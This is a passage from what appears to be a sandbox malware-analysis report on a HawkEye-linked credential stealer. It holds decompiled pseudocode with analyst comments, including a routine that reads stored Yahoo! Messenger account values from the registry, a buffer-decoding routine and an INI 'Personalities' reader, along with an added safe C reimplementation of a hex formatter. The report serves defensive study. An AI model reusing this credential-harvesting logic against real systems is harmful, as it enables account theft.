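The decompiled routine above is a hex formatter with an unchecked output buffer, so it is worth knowing exactly what it emits and how large its output gets. The following C is an added example, not code from the sample or from Joe Sandbox: it reimplements the same layout with bounds checking, keeps the original's leading-space quirk, and computes the exact output length for a given group size. The names `hawkeye_hexdump`, `hawkeye_hexdump_len`, `fill_sample` and the argument roles (out = __edi, data = _a4, group = _a8) are assumptions inferred from the decompilation; the 0x00..0x7F input is constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

#define DUMP_BYTES 0x80  /* the loop in E00406585 always walks 128 bytes */

/* Worst case (group == 1): 2 hex chars per byte, 127 separator spaces,
   two extra spaces at each of the 128 group boundaries, plus the NUL. */
#define DUMP_OUT_MAX (DUMP_BYTES * 2 + (DUMP_BYTES - 1) + DUMP_BYTES * 2 + 1)

/* Bounded append; returns 0 instead of overflowing like the original strcat. */
static int append(char *out, size_t out_len, size_t *pos, const char *s)
{
    size_t n = strlen(s);
    if (*pos + n + 1 > out_len)
        return 0;
    memcpy(out + *pos, s, n + 1);
    *pos += n;
    return 1;
}

/* Reimplementation of E00406585 (argument roles inferred, see lead-in).
   Returns the output length without the NUL, or -1 if out_len is too small. */
int hawkeye_hexdump(char *out, size_t out_len, const unsigned char *data, int group)
{
    char hex[4];
    size_t pos = 0;

    if (out_len == 0)
        return -1;
    out[0] = '\0';
    for (int i = 0; i < DUMP_BYTES; i++) {
        if (i > 0 && !append(out, out_len, &pos, " "))
            return -1;
        /* Quirk kept from the original: i % group == 0 also holds for i == 0,
           so with group > 0 the dump starts with two leading spaces and every
           later group boundary is three spaces wide. */
        if (group > 0 && i % group == 0 && !append(out, out_len, &pos, "  "))
            return -1;
        snprintf(hex, sizeof hex, "%2.2X", data[i]);
        if (!append(out, out_len, &pos, hex))
            return -1;
    }
    return (int)pos;
}

/* Exact output length for a given group size, derived from the loop above;
   useful for sizing the caller's buffer (the original never checks it). */
int hawkeye_hexdump_len(int group)
{
    int len = DUMP_BYTES * 2 + (DUMP_BYTES - 1);
    if (group > 0)
        len += 2 * ((DUMP_BYTES - 1) / group + 1);
    return len;
}

/* Constructed sample input (bytes 0x00..0x7F); not data from the sample. */
static void fill_sample(unsigned char *buf)
{
    for (int i = 0; i < DUMP_BYTES; i++)
        buf[i] = (unsigned char)i;
}

/* Formats the constructed input into a buffer of out_len bytes (capped at
   DUMP_OUT_MAX) and returns the length, or -1 on overflow. */
int demo_len(int group, size_t out_len)
{
    unsigned char buf[DUMP_BYTES];
    char out[DUMP_OUT_MAX];
    fill_sample(buf);
    if (out_len > sizeof out)
        out_len = sizeof out;
    return hawkeye_hexdump(out, out_len, buf, group);
}

/* 1 if the formatted constructed input starts with expect, else 0. */
int demo_starts_with(int group, const char *expect)
{
    unsigned char buf[DUMP_BYTES];
    char out[DUMP_OUT_MAX];
    fill_sample(buf);
    if (hawkeye_hexdump(out, sizeof out, buf, group) < 0)
        return 0;
    return strncmp(out, expect, strlen(expect)) == 0;
}

int main(void)
{
    unsigned char buf[DUMP_BYTES];
    char out[DUMP_OUT_MAX];
    fill_sample(buf);
    hawkeye_hexdump(out, sizeof out, buf, 8);
    printf("%s\n", out);
    return 0;
}
```

With group 8 the output is 415 characters and begins `  00 01 02 03 04 05 06 07   08 09`; with group 0 it is 383 characters with single-space separators only. That fixed shape (128 bytes, uppercase hex, triple-space group breaks) is a usable fingerprint for the formatted data this routine produces.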

Statement addresses: 0x00406585, 0x0040659d, 0x004065a4, 0x004065a9, 0x004065ac, 0x004065af, 0x004065b1, 0x004065b8, 0x004065c5, 0x004065ca, 0x004065cf, 0x004065d7, 0x004065dd, 0x004065e2, 0x004065e6, 0x004065ec, 0x004065f4, 0x004065fa, 0x004065ec, 0x00406603, 0x00406608, 0x00406610, 0x00406617

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcat$memsetsprintf
• String ID: %2.2X
• API String ID: 582077193-791839006
• Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
• Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
• Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
• Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
			/* Editor note: destructor-style cleanup of the object whose this pointer is in
			   __edi. The store of 0x414288 to *__edi resets the vtable pointer, the
			   L004115D6 calls are operator delete (API ID ??3@ below), and E00406B5B /
			   E00406A4E appear to be the destructors of the owned objects, run before each
			   delete (inferred from the call pattern, not confirmed by the report). Only the
			   member at +0x1c is zeroed after being freed; the five at +0x450..+0x460 are
			   deleted but left dangling. */
			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}

Statement addresses: 0x0040feed, 0x0040feed, 0x0040fef2, 0x0040fef8, 0x0040fefa, 0x0040fefb, 0x0040ff00, 0x0040ff04, 0x0040ff06, 0x0040ff0e, 0x0040ff10, 0x0040ff15, 0x0040ff16, 0x0040ff1b, 0x0040ff1c, 0x0040ff24, 0x0040ff26, 0x0040ff2b, 0x0040ff2c, 0x0040ff31, 0x0040ff32, 0x0040ff3a, 0x0040ff3c, 0x0040ff41, 0x0040ff42, 0x0040ff47, 0x0040ff48, 0x0040ff50, 0x0040ff52, 0x0040ff57, 0x0040ff58, 0x0040ff5d, 0x0040ff5e, 0x0040ff66, 0x0040ff68, 0x0040ff6d, 0x0040ff6e, 0x0040ff73, 0x0040ff75

Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
• Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
• Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
• Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
Uniqueness Score: -1.00%

C-Code - Quality: 96%
E0040173B(void* __ebx) {
	struct tagRECT _v20;
	struct tagPAINTSTRUCT _v84;

	// Paint handler for the window whose handle is stored at __ebx+0x10:
	// shrink the client rect to its bottom-right corner using the scrollbar
	// metrics (0x15 = SM_CXVSCROLL, 0x14 = SM_CYHSCROLL) and draw a size grip.
	GetClientRect( *(__ebx + 0x10),  &_v20);
	_v20.left = _v20.right - GetSystemMetrics(0x15);
	_v20.top = _v20.bottom - GetSystemMetrics(0x14);
	asm("movsd");
	asm("movsd");
	asm("movsd");
	asm("movsd");
	// DrawFrameControl(hdc, &rect, DFC_SCROLL (3), DFCS_SCROLLSIZEGRIP (8))
	DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
	return EndPaint( *(__ebx + 0x10),  &_v84);
}

Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
• Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
• Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
• Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
Uniqueness Score: -1.00%

C-Code - Quality: 96%
E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
	signed int _v8;
	char _v16;
	char _v24;
	char _v116;
	void _v1156;
	char _v1164;
	void _v1171;
	char _v1172;
	char _v2188;
	void _v2195;
	void _v2196;
	void _v3251;
	void _v3252;
	char _v4020;
	void* __edi;
	void* __esi;
	void* _t96;
	char _t105;
	intOrPtr _t112;
	void* _t115;
	signed int _t116;
	int _t121;
	signed int* _t122;
	void* _t124;
	void* _t125;
	signed int _t128;
	signed int* _t129;
	void* _t132;

	_t116 = __edx;
	_t105 = 0;                      // return value: stays 0 unless the buffer is processed
	// zero the three local work buffers
	_v2196 = 0;
	memset( &_v2195, 0, 0x3ff);
	_v3252 = 0;
	memset( &_v3251, 0, 0x41e);
	_v1172 = 0;
	memset( &_v1171, 0, 0x41e);
	// E00410E8A fills _v2196 from _a8 and returns a byte count, which is
	// compared against 8 and 0x18 below
	_a8 = E00410E8A(_a8,  &_v2196);
	_t121 = strlen(_a4);
	if(_a8 > 8) {
		_t137 = _t121;
		if(_t121 > 0) {
			// _v3252 = _a4 string followed by the first 8 bytes of _v2196
			memcpy( &_v3252, _a4, _t121);
			memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
			E0040BC49( &_v116);
			_t19 = _t121 + 8; // 0x8
			E0040BC6D(_t19,  &_v116,  &_v3252);
			_t127 =  &_v116;
			E0040BD0B(_t121,  &_v116,  &_v1172);
			_t23 = _t121 + 8; // 0x8
			memcpy( &_v1156,  &_v3252, _t23);
			E0040BC49( &_v116);
			_t27 = _t121 + 0x18; // 0x18
			E0040BC6D(_t27, _t127,  &_v1172);
			E0040BD0B(_t121, _t127,  &_v24);
			E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
			_t122 = _a12;
			E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
			_t112 = _a8;
			_t128 = 0;
			// _t128 = number of additional 8-byte blocks once _a8 exceeds 0x18 bytes
			if(_t112 >= 0x18) {
				_t37 = _t112 - 0x18; // -16
				asm("cdq");
				_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
			}
			if(_t128 > _t105) {
				// process _a12 in 8-byte steps, writing each block's output into _v2188
				_a4 =  &_v2188;
				_t125 = _t122 + 8;
				_v8 = _t128;
				do {
					E004053D6(_a4, _t112, _t125,  &_v4020);
					_a4 = _a4 + 8;
					_t125 = _t125 + 8;
					_t45 =  &_v8;
					 *_t45 = _v8 - 1;
					_pop(_t112);
				} while ( *_t45 != 0);
				_t112 = _a8;
			}
			// _t96 = number of output bytes, clamped to _a8 - 8
			_t96 = 8 + _t128 * 8;
			_t50 = _t96 + 8; // 0x8
			if(_t50 > _t112) {
				_t51 = _t112 - 8; // 0x0
				_t96 = _t51;
			}
			if(_t96 > _t105) {
				// XOR _t96 bytes of _a12 in place with the block output at _v2188
				// (_t124 is the distance between the two buffers)
				_t129 = _a12;
				_t124 =  &_v2188 - _t129;
				_t115 = _t96;
				do {
					 *_t129 =  *_t129 ^  *(_t124 + _t129);
					_t129 =  &(_t129[0]);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
			}
			// NUL-terminate the result and report success through _a16
			 *((char*)(_t96 + _a12)) = _t105;
			 *_a16 = 1;
			_t105 = 1;
		}
	}
	return _t105;
}
                                                                                                                                                    0x004114c8
                                                                                                                                                    0x004114cb
                                                                                                                                                    0x004114ce
                                                                                                                                                    0x004114d8
                                                                                                                                                    0x004114dd
                                                                                                                                                    0x004114e1
                                                                                                                                                    0x004114e4
                                                                                                                                                    0x004114e4
                                                                                                                                                    0x004114e7
                                                                                                                                                    0x004114e7
                                                                                                                                                    0x004114ea
                                                                                                                                                    0x004114ea
                                                                                                                                                    0x004114ed
                                                                                                                                                    0x004114f4
                                                                                                                                                    0x004114f9
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x00411500
                                                                                                                                                    0x00411502
                                                                                                                                                    0x0041150b
                                                                                                                                                    0x0041150d
                                                                                                                                                    0x0041150f
                                                                                                                                                    0x00411512
                                                                                                                                                    0x00411514
                                                                                                                                                    0x00411515
                                                                                                                                                    0x00411515
                                                                                                                                                    0x0041150f
                                                                                                                                                    0x0041151b
                                                                                                                                                    0x00411524
                                                                                                                                                    0x00411526
                                                                                                                                                    0x00411526
                                                                                                                                                    0x004113e4
                                                                                                                                                    0x0041152e

APIs
• memset.MSVCRT ref: 00411387
• memset.MSVCRT ref: 004113A0
• memset.MSVCRT ref: 004113B4
  • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
• strlen.MSVCRT ref: 004113D0
• memcpy.MSVCRT ref: 004113F5
• memcpy.MSVCRT ref: 0041140B
  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
  • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
• memcpy.MSVCRT ref: 0041144B
  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                    • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                                                                    • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                                                                                    • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                                                                    • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 36%
E004078FF(signed short __ebx) {
	signed int _t17;
	void* _t18;
	intOrPtr _t23;
	void* _t31;
	signed short _t39;
	signed int _t40;
	void* _t51;
	int _t56;
	void* _t57;
	int _t67;

	_t39 = __ebx;
	if( *0x417540 == 0) {
		E0040787D();
	}
	_t40 =  *0x417538;
	_t17 = 0;
	if(_t40 <= 0) {
		L5:
		_t51 = 0;
	} else {
		while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
			_t17 = _t17 + 1;
			if(_t17 < _t40) {
				continue;
			} else {
				goto L5;
			}
			goto L6;
		}
		_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
	}
	L6:
	if(_t51 != 0) {
		L22:
		_t18 = _t51;
	} else {
		if((_t39 & 0x00010000) == 0) {
			if( *0x4171b8 == 0) {
				_push( *0x417548 - 1);
				_push( *0x41752c);
				_push(_t39);
				_push(E00407A55());
				goto L16;
			} else {
				strcpy(0x4172c0, "strings");
				_t31 = E00407D89(_t39,  *0x41752c);
				_t57 = _t57 + 0x10;
				if(_t31 == 0) {
					L14:
					_push( *0x417548 - 1);
					_push( *0x41752c);
					_push(_t39);
					goto L9;
				} else {
					_t56 = strlen( *0x41752c);
					if(_t56 == 0) {
						goto L14;
					}
				}
			}
		} else {
			_push( *0x417548 - 1);
			_push( *0x41752c);
			_push(_t39 & 0x0000ffff);
			L9:
			_push( *0x416b94);
			L16:
			_t56 = LoadStringA();
			_t67 = _t56;
		}
		if(_t67 <= 0) {
			L21:
			_t18 = 0x412466;
		} else {
			_t23 =  *0x41753c;
			if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
				goto L21;
			} else {
				_t51 = _t23 +  *0x417528;
				_t10 = _t56 + 1; // 0x1
				memcpy(_t51,  *0x41752c, _t10);
				 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
				 *( *0x417530 +  *0x417538 * 4) = _t39;
				 *0x417538 =  *0x417538 + 1;
				 *0x41753c =  *0x41753c + _t56 + 1;
				if(_t51 != 0) {
					goto L22;
				} else {
					goto L21;
				}
			}
		}
	}
	return _t18;
}
0x004078ff 0x00407906 0x00407908 0x00407908 0x0040790d 0x00407914 0x00407919 0x0040792b
0x0040792b 0x0040791b 0x0040791b 0x00407926 0x00407929 0x00000000 0x00000000 0x00000000
0x00000000 0x00000000 0x00407929 0x0040795f 0x0040795f 0x0040792d 0x0040792f 0x00407a50
0x00407a50 0x00407935 0x0040793b 0x0040796e 0x004079ba 0x004079bb 0x004079c1 0x004079c7
0x00000000 0x00407970 0x0040797a 0x00407986 0x0040798b 0x00407990 0x004079a4 0x004079aa
0x004079ab 0x004079b1 0x00000000 0x00407992 0x0040799d 0x004079a2 0x00000000 0x00000000
0x004079a2 0x00407990 0x0040793d 0x00407943 0x00407944 0x0040794d 0x0040794e 0x0040794e
0x004079c8 0x004079ce 0x004079d0 0x004079d0 0x004079d2 0x00407a49 0x00407a49 0x004079d4
0x004079d4 0x004079e3 0x00000000 0x004079f3 0x004079f9 0x004079fc 0x00407a07 0x00407a1d
0x00407a2b 0x00407a36 0x00407a42 0x00407a47 0x00000000 0x00000000 0x00000000 0x00000000
0x00407a47 0x004079e3 0x004079d2 0x00407a54

APIs
• strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
  • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
• strlen.MSVCRT ref: 00407998
• LoadStringA.USER32 ref: 004079C8
• memcpy.MSVCRT ref: 00407A07
  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$LoadString_itoamemcpystrcpystrlen
• String ID: strings
• API String ID: 1748916193-3030018805
• Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
• Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
• Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
• Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}

0x0040329e 0x004032ac 0x004032b6 0x004032bd 0x004032c3 0x004032d3 0x004032da 0x004032da
0x004032ec 0x004032f2 0x0040330c 0x00403314 0x00403390 0x00000000 0x00403316 0x00403316
0x00403319 0x0040331c 0x0040331f 0x00403322 0x00403324 0x00403382 0x00403383 0x0040338a
0x0040338e 0x00000000 0x00000000 0x0040332c 0x00403332 0x0040334a 0x00403367 0x00403367
0x0040336c 0x0040336f 0x00403379 0x00000000 0x0040337b
                                                                                                                                                    0x0040337b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040337b
                                                                                                                                                    0x00403379
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403382
                                                                                                                                                    0x00403314
                                                                                                                                                    0x00403394

APIs
  • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
• memset.MSVCRT ref: 004032F2
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
• strchr.MSVCRT ref: 00403341
  • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
• strlen.MSVCRT ref: 00403383
  • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
• Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
• Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
• Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
	void* _v8;
	void _v1031;
	char _v1032;
	void* __esi;
	void* _t25;
	int _t26;

	_t25 = __ecx;
	_t26 = 0;
	_v1032 = 0;
	memset( &_v1031, 0, 0x3ff);
	/* 0x80000001 is HKEY_CURRENT_USER: opens HKCU\Software\Yahoo\Pager and reads the
	   stored "Yahoo! User ID" and "EOptions string" values (Yahoo! Messenger account data) */
	if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
		if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
			_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
		}
		RegCloseKey(_v8);
	}
	return _t26;
}
APIs
• memset.MSVCRT ref: 00410F9B
  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
• Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
• Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
• Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405F41(long __eax, struct HWND__* _a4) {
	char _v1028;
	char _v2052;
	void* __edi;
	long _t15;

	/* Error reporting helper: uses the code passed in __eax, or GetLastError() when it is 0,
	   formats it as "Error %d: %s" and shows it in a message box (0x30 = MB_ICONWARNING) */
	_t15 = __eax;
	if(__eax == 0) {
		_t15 = GetLastError();
	}
	E00405E46(_t15,  &_v1028);
	sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
	return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
}
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
• Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
• Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
• Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
• Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 68%
E0040F037(intOrPtr _a4) {
	_Unknown_base(*)()* _t3;
	void* _t7;
	struct HINSTANCE__* _t8;

	/* Resolves SHAutoComplete from shlwapi.dll at run time and enables it on the edit control _a4;
	   0x10000001 = SHACF_FILESYSTEM | SHACF_AUTOSUGGEST_FORCE_ON */
	_t7 = 0;
	_t8 = LoadLibraryA("shlwapi.dll");
	_t3 = GetProcAddress(_t8, "SHAutoComplete");
	if(_t3 != 0) {
		_t7 =  *_t3(_a4, 0x10000001);
	}
	FreeLibrary(_t8);
	return _t7;
}
APIs
• LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,74EB48C0,00405C41,00000000), ref: 0040F040
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
• FreeLibrary.KERNEL32(00000000), ref: 0040F066
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
